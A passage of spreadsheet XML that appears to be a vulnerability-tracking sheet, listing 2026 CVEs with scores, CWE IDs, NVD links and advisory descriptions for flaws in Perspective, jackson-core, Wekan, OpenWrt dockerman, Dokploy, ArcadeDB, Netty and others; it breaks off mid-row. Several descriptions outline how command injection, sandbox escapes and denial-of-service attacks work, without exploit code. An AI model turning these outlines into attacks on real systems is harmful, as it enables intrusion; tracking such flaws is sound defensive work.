          <t>CVE-2026-67195</t>
        </is>
      </c>
      <c r="C435" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E435" s="5" t="inlineStr"/>
      <c r="F435" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G435" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H435" s="5" t="inlineStr"/>
      <c r="I435" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L435" s="5" t="inlineStr">
        <is>
          <t>Perspective 5.0.0 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary operating system commands by submitting crafted expression strings to the PolarsVirtualServer backend, which passes client-supplied input directly to Python's eval() with only __builtins__={} cleared. Attackers can exploit Python object attribute traversal through the interpreter's loaded class list to reach subprocess.Popen via a TableValidateExprReq or TableMakeViewReq protobuf message, achieving arbitrary command execution in the Perspective host process.</t>
        </is>
      </c>
      <c r="M435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67195</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68494</t>
        </is>
      </c>
      <c r="C436" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E436" s="5" t="inlineStr"/>
      <c r="F436" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G436" s="5" t="inlineStr">
        <is>
          <t>java, spring</t>
        </is>
      </c>
      <c r="H436" s="5" t="inlineStr"/>
      <c r="I436" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L436" s="5" t="inlineStr">
        <is>
          <t>The fix released in jackson-core 2.18.6 and 2.21.1 for CVE-2026-18401 (GHSA-72hv-8253-57qq, number length constraint bypass in the non-blocking parser) is incomplete. This record covers the remaining bypass.
The earlier fix wired validateIntegerLength() into a new _setIntLength() helper and invoked it wherever the integer portion of a number is decided: a terminator byte arrives, a '.' or 'e'/'E' is seen, or input ends inside a fully buffered value. It was not invoked on the attacker-relevant path where the parser runs out of input while still inside the MINOR_NUMBER_INTEGER_DIGITS minor state and returns NOT_AVAILABLE to the caller.
As a result, an attacker who streams JSON to a non-blocking parser in many small chunks, without ever sending a terminator byte, keeps the parser inside MINOR_NUMBER_INTEGER_DIGITS indefinitely. _textBuffer.expandCurrentSegment() grows the accumulator on every chunk while validateIntegerLength() is never called. The accumulator is bounded only by maxStringLength (20 MiB by default) rather than by maxNumberLength (1000 by default), an amplification of roughly 20,000x over the documented limit. Because Java char values occupy two bytes, a single connection can be driven to approximately 40 MiB of heap before the validator finally fires when the value completes.
The equivalent fraction-path code is correct: _finishFloatFraction() calls _setFractLength() before its NOT_AVAILABLE return. The missing call affects the integer-digit paths in _startPositiveNumber(), _startNegativeNumber() and _finishNumberIntegralPart() in NonBlockingUtf8JsonParserBase.
Impact: reactive frameworks such as Spring WebFlux/Reactor, Quarkus, Helidon and Vert.x feed inbound HTTP or gRPC bytes to the async parser as they arrive, which is precisely the chunked-feed shape required. Operators who set StreamReadConstraints.maxNumberLength expecting it to cap memory per number value do not get that guarantee; memory accumulates per concurrent connection and attacker-controlled concurrency can exhaust the JVM heap. The synchronous parsers (UTF8StreamJsonParser, ReaderBasedJsonParser) and the async parser operating on complete input are not affected.
Exploitation requires only the ability to stream data to a parsing endpoint; no privileges or user interaction are needed.
This issue affects com.fasterxml.jackson.core:jackson-core from version 2.15.0 through 2.18.7, and from 2.19.0 through 2.21.3, and tools.jackson.core:jackson-core from 3.0.0 through 3.1.3. Versions prior to 2.15.0 are not affected, because StreamReadConstraints -- which defines the maxNumberLength setting -- was first introduced in jackson-core 2.15.0, so no such constraint exists to be bypassed in earlier releases. Note that GHSA-r7wm-3cxj-wff9 states the affected 2.x range without a lower bound. The 2.22.x and 3.2.x release lines are not affected: those branches were created after the fix commit landed on 2026-05-21 and therefore contain it from their initial releases (2.22.0, tagged 2026-06-03, and 3.2.0, tagged 2026-06-08).</t>
        </is>
      </c>
      <c r="M436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68494</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68899</t>
        </is>
      </c>
      <c r="C437" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E437" s="5" t="inlineStr"/>
      <c r="F437" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G437" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H437" s="5" t="inlineStr"/>
      <c r="I437" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L437" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. Prior to 9.90, isFileValid() in models/fileValidation.js used the Unix file command for content-based MIME detection, but detectMimeFromFile() silently returned undefined when that binary was unavailable and the validation fell back to the attacker-controlled fileObj.type supplied through server/routes/attachmentApi.js. On deployments with WITH_API=true and no file binary, an authenticated board member could label HTML containing JavaScript as image/png, bypass the dangerous MIME check, and store active content under the Wekan origin for execution when another user opened it. Version 9.90 adds looksLikeDangerousMarkup() to inspect file bytes and force dangerous-content scanning when MIME detection is unavailable. This issue is fixed in version 9.90.</t>
        </is>
      </c>
      <c r="M437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68899</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69096</t>
        </is>
      </c>
      <c r="C438" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E438" s="5" t="inlineStr"/>
      <c r="F438" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G438" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H438" s="5" t="inlineStr"/>
      <c r="I438" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L438" s="5" t="inlineStr">
        <is>
          <t>OpenWrt luci-app-dockerman (LuCI master and openwrt-25.12 snapshots containing the ucode docker_rpc.uc RPC backend after the JS/ucode conversion) contains an OS command injection vulnerability. The package's read ACL grants broad ubus access to docker.* / docker.container.*, which exposes the docker.container.ttyd_start method even though it performs mutating operations. The run_ttyd handler builds a shell command from the request-controlled id, cmd, and uid fields and passes it to system() without quoting or argv-style execution in the rpcd root context. An authenticated attacker holding only the luci-app-dockerman read ACL can inject shell metacharacters (e.g., in id) to execute arbitrary commands as root via an HTTP POST to /ubus. openwrt-24.10 and openwrt-23.05 do not contain this backend and are not affected; no patched version was known as of the advisory.</t>
        </is>
      </c>
      <c r="M438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69096</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69220</t>
        </is>
      </c>
      <c r="C439" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E439" s="5" t="inlineStr"/>
      <c r="F439" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G439" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H439" s="5" t="inlineStr"/>
      <c r="I439" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L439" s="5" t="inlineStr">
        <is>
          <t>The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.33.1, src/main/java/com/rabbitmq/client/impl/ValueReader.java permits ValueReader.readTable and ValueReader.readArray to call ValueReader.readFieldValue recursively for AMQP table type F and AMQP array type A values without a nesting-depth limit. A malicious AMQP server or network intermediary can send approximately 580 nested table levels in the pre-authentication connection.start frame, fitting within the default 131072-byte frame maximum, to trigger StackOverflowError. The error terminates the client input processing thread and causes denial of service. This issue is fixed in version 5.33.1.</t>
        </is>
      </c>
      <c r="M439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69220</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69249</t>
        </is>
      </c>
      <c r="C440" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E440" s="5" t="inlineStr"/>
      <c r="F440" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G440" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H440" s="5" t="inlineStr"/>
      <c r="I440" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L440" s="5" t="inlineStr">
        <is>
          <t>python-cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. In versions 42.0.0 through 48.0.0, when resolving invalid certificate chains that include duplicate copies of self-signed certificates, the processing recursively invokes the same candidate, leading to an exponential blowup. Although the limitation that the chain depth cannot exceed a specified maximum depth prevents unbounded recursion and guarantees termination, an attacker-controlled certificate chain can lead the processing to easily take more than 5s to reject in testing. This amplification could form the basis for a resource exhaustion denial of service attack. The core issue arises in the recursive nature of build_chain_inner, which does not de-duplicate against previously analyzed candidates. As the correctness of validation is not affected, the integrity of a system cannot be compromised through this vector, only its availability. This issue is fixed in 49.0.0.</t>
        </is>
      </c>
      <c r="M440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69249</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71491</t>
        </is>
      </c>
      <c r="C441" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E441" s="5" t="inlineStr"/>
      <c r="F441" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G441" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H441" s="5" t="inlineStr"/>
      <c r="I441" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L441" s="5" t="inlineStr">
        <is>
          <t>sqlparse is a non-validating SQL parser module for Python. Prior to 0.6.0, group_comments in sqlparse/engine/grouping.py repeatedly rescans comment-only statements before the MAX_GROUPING_TOKENS guard, causing quadratic CPU consumption through sqlparse.parse() and sqlparse.format(sql, strip_comments=True). This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71491</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72870</t>
        </is>
      </c>
      <c r="C442" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E442" s="5" t="inlineStr"/>
      <c r="F442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G442" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H442" s="5" t="inlineStr"/>
      <c r="I442" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L442" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the buildRemoteDocker() function in packages/server/src/utils/providers/docker.ts interpolates the application-controlled dockerImage value directly into a docker pull shell command. An authenticated user with project access can set a crafted dockerImage through application.update and trigger application.deploy, causing execAsync() to execute arbitrary operating-system commands as the Dokploy server process. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72870</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72884</t>
        </is>
      </c>
      <c r="C443" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E443" s="5" t="inlineStr"/>
      <c r="F443" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G443" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H443" s="5" t="inlineStr"/>
      <c r="I443" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L443" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, sanitizeCommand in packages/server/src/utils/builders/compose.ts only trims whitespace and strips surrounding quotes from compose.command before exportEnvCommand and docker command interpolation, allowing an authenticated user who can update a Compose service to inject shell metacharacters and execute arbitrary commands on the Dokploy host. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72884</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73413</t>
        </is>
      </c>
      <c r="C444" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E444" s="5" t="inlineStr"/>
      <c r="F444" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G444" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H444" s="5" t="inlineStr"/>
      <c r="I444" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L444" s="5" t="inlineStr">
        <is>
          <t>Shescape is a simple shell escape library for JavaScript. From 2.1.11 until 2.1.14 and 3.0.1, the flag-protection loop in compose in src/internal/compose.js repeatedly joins and slices flag fragments when flagProtection is enabled, which is the default, making processing quadratic in input size across the escape, escapeAll, quote, and quoteAll APIs. An attacker who can supply a large untrusted input containing many flag fragments can consume CPU and cause denial of service. This issue is fixed in versions 2.1.14 and 3.0.1.</t>
        </is>
      </c>
      <c r="M444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73413</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74787</t>
        </is>
      </c>
      <c r="C445" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E445" s="5" t="inlineStr"/>
      <c r="F445" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G445" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H445" s="5" t="inlineStr"/>
      <c r="I445" s="5" t="inlineStr">
        <is>
          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L445" s="5" t="inlineStr">
        <is>
          <t>Scriban before 7.0.0 contains an uncontrolled recursion vulnerability in the object.to_json builtin function that lacks depth limits and circular reference detection. Attackers can craft templates with self-referencing objects to trigger unbounded recursion, causing a StackOverflowException that fatally terminates the hosting .NET process.</t>
        </is>
      </c>
      <c r="M445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74787</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75133</t>
        </is>
      </c>
      <c r="C446" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E446" s="5" t="inlineStr"/>
      <c r="F446" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G446" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H446" s="5" t="inlineStr"/>
      <c r="I446" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L446" s="5" t="inlineStr">
        <is>
          <t>Keep Backup Daily plugin for WordPress before 2.1.4 contains a sensitive information exposure vulnerability that allows unauthenticated attackers to trigger a full MySQL database dump by accessing the publicly exposed `kbd_cron_process` parameter without authentication. Attackers can predict the partially predictable dump filename based on the database name, a limited random range, and the current Unix timestamp to download the generated backup from the publicly accessible uploads directory.</t>
        </is>
      </c>
      <c r="M446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75133</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75596</t>
        </is>
      </c>
      <c r="C447" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E447" s="5" t="inlineStr"/>
      <c r="F447" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G447" s="5" t="inlineStr">
        <is>
          <t>java, .net</t>
        </is>
      </c>
      <c r="H447" s="5" t="inlineStr"/>
      <c r="I447" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L447" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, the default io.netty.handler.ssl.SniHandler constructors use the pre-handshake ClientHello aggregation path in handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java at io.netty.handler.ssl.SslClientHelloHandler#decode, where handshakeBuffer.clear() and writeBytes() recopy all previously received body bytes for every additional TLS record. An unauthenticated remote peer can advertise a large ClientHello and deliver its body in thousands of tiny records, causing quadratic CPU work on the event loop before the TLS handshake completes and degrading TLS handling for other clients. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75596</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75840</t>
        </is>
      </c>
      <c r="C448" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E448" s="5" t="inlineStr"/>
      <c r="F448" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G448" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H448" s="5" t="inlineStr"/>
      <c r="I448" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="L448" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 contains an arbitrary file read vulnerability in the GraalVM JavaScript sandbox allowlist enforcement, which uses unescaped regular expressions to validate package names. Attackers with trigger creation privileges can use Java.type() to access java.util.zip.ZipFile or java.util.jar.JarFile classes and read arbitrary files on the host system as the ArcadeDB server process.</t>
        </is>
      </c>
      <c r="M448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75840</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75915</t>
        </is>
      </c>
      <c r="C449" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E449" s="5" t="inlineStr"/>
      <c r="F449" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G449" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H449" s="5" t="inlineStr"/>
      <c r="I449" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L449" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions before 0.8.64 contain an environment variable exposure vulnerability in the js_execution tool that fails to scrub parent process environment variables before spawning Node.js. Attackers can craft malicious JavaScript code executed by the tool to read process.env and leak API keys, cloud credentials, and authentication tokens back to the model context.</t>
        </is>
      </c>
      <c r="M449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75915</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76224</t>
        </is>
      </c>
      <c r="C450" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E450" s="5" t="inlineStr"/>
      <c r="F450" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G450" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H450" s="5" t="inlineStr"/>
      <c r="I450" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L450" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 (arcadedb-gremlin, affected &lt;= 26.7.3) contains a remote code execution vulnerability in its Gremlin query engine. Although the engine defaults to the documented-secure java (gremlin-lang) engine, ArcadeGremlin.executeStatement() silently falls back to the insecure Groovy engine whenever a request carries any query parameter and the query does not parse as gremlin-lang. An authenticated user with any database role, including a read-only reader, can submit a parameterized Gremlin query to trigger the Groovy fallback and execute arbitrary operating system commands as the ArcadeDB server process user.</t>
        </is>
      </c>
      <c r="M450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76224</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77101</t>
        </is>
      </c>
      <c r="C451" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E451" s="5" t="inlineStr"/>
      <c r="F451" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G451" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H451" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L451" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a stack-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77101</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77102</t>
        </is>
      </c>
      <c r="C452" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E452" s="5" t="inlineStr"/>
      <c r="F452" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G452" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H452" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L452" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a heap-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77102</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77103</t>
        </is>
      </c>
      <c r="C453" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E453" s="5" t="inlineStr"/>
      <c r="F453" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G453" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H453" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr">
